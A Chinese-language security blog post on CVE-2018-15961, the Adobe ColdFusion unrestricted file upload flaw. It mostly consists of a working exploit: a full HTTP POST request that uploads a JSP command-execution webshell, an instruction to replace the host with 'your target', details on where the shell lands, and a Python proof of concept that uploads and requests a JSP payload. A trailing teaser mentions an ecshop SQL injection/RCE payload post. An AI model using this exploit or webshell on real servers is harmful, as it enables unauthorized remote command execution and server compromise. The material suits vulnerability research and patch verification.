Adobe ColdFusion Unrestricted File Upload Vulnerability(CVE-2018-15961)

Adobe 在新的bulletin里面提到了CVE-2018-15961被大量利用:https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html 网上最早的分析报告有:https://www.volexity.com/blog/2018/11/08/active-exploitation-of-newly-patched-coldfusion-vulnerability-cve-2018-15961/ 但是里面并没有提到具体的POST包,我本地搭建环境,抓了下包,得到了最终getshell的POST包:

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
Host: 172.16.59.130:8500
Content-Length: 1115
Cache-Control: max-age=0
Origin: http://172.16.59.130:8500
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynLGnAOgQ8df3hQ61
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://172.16.59.130:8500/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/filemanager.cfm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: JSESSIONID=E69D416EB891D3E7CDBF0FE787F13E79.cfusion
Connection: close

------WebKitFormBoundarynLGnAOgQ8df3hQ61
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: application/octet-stream

<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

------WebKitFormBoundarynLGnAOgQ8df3hQ61
Content-Disposition: form-data; name="path"

1
------WebKitFormBoundarynLGnAOgQ8df3hQ61--

把host改成你的目标即可,这里需要注意的是path参数一定要指定。成功上传之后会在filemanager目录下创建一个uploadedFiles目录,上传webshell就在该目录下 coldfusion默认部署完是存在列目录的漏洞,所以找到上传的文件不难。如果uploadedFiles目录里面已经存在相同的文件xxoo.jsp,新上传的文件会被改名为xxoo1.jsp xx002.jsp

写在最后,希望大家在研究漏洞的时候注意自身安全,已经有多个国外媒体提到这次漏洞疑似中国的apt攻击,有人利用该漏洞上传了china chopper(菜刀)

#update 2018-11-20 更新下python版的PoC:

def main(argv):

    print "Proof of Concept"
    print "Copyright Trend Micro Security Research"
    print "All Rights Reserved.\n"

    args = parse_args(argv)

    host = args['host']
    port = args['port']

    # Upload file
    CRLF = "\r\n"

    body = '--XX' + CRLF
    body += 'Content-Disposition: form-data; name="path"' + CRLF
    body += CRLF
    body += '/home/' + CRLF
    body += '--XX' + CRLF
    body += 'Content-Disposition: form-data; name="file"; filename="poc.jsp"' + CRLF
    body += 'Content-Type: application/octet-stream' + CRLF
    body += CRLF
    body += '''<%@ page import="java.util.*, java.io.*" %>
<% Runtime run = Runtime.getRuntime();
Process p = run.exec("calc.exe");
try{ p.waitFor(); }
catch(InterruptedException e)
{ System.out.println(e); } %> ''' + CRLF
    body += "--XX--"
    lenn = str(len(body))

    headers = {"Accept": "*/*",
               "Connection": "keep-alive",
               "Host": host + ":" + str(args['port']),
               "Content-Length": "" + lenn,
               "Content-Type": "multipart/form-data; boundary=XX"}
    conN = httplib.HTTPConnection(args['host']+ ":" + str(args['port']))
    print "[*] Uploading .jsp file to server..."
    conN.request("POST", "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm?action=upload",
body, headers)
    response = conN.getresponse()
    buf = response.read()

    print "[*] Requesting uploaded .jsp file..."
    conN = httplib.HTTPConnection(args['host'] + ":" + str(args['port']))
    conN.request("GET", "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/poc.jsp")
    print "[*] Check the server to see if CVE-2018-15961 has been triggered.\n"
更早的文章

ecshop 2.x 3.x SQL injection/RCE payload

首先,感谢ringk3y的分析:http://ringk3y.com/2018/08/31/ecshop2-x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ 大家跟一遍代码基本上都能弄明白漏洞的原理,整个漏洞的构造还是很有意思的然后网上公开的基本上都是2.x版本的payload,对于sql injection,除了文中提到的insert_ads,insert_bought_notes函数同样存在漏洞: $sql = 'SELECT u.user_name,...…

ecshop sql injection rce payload继续阅读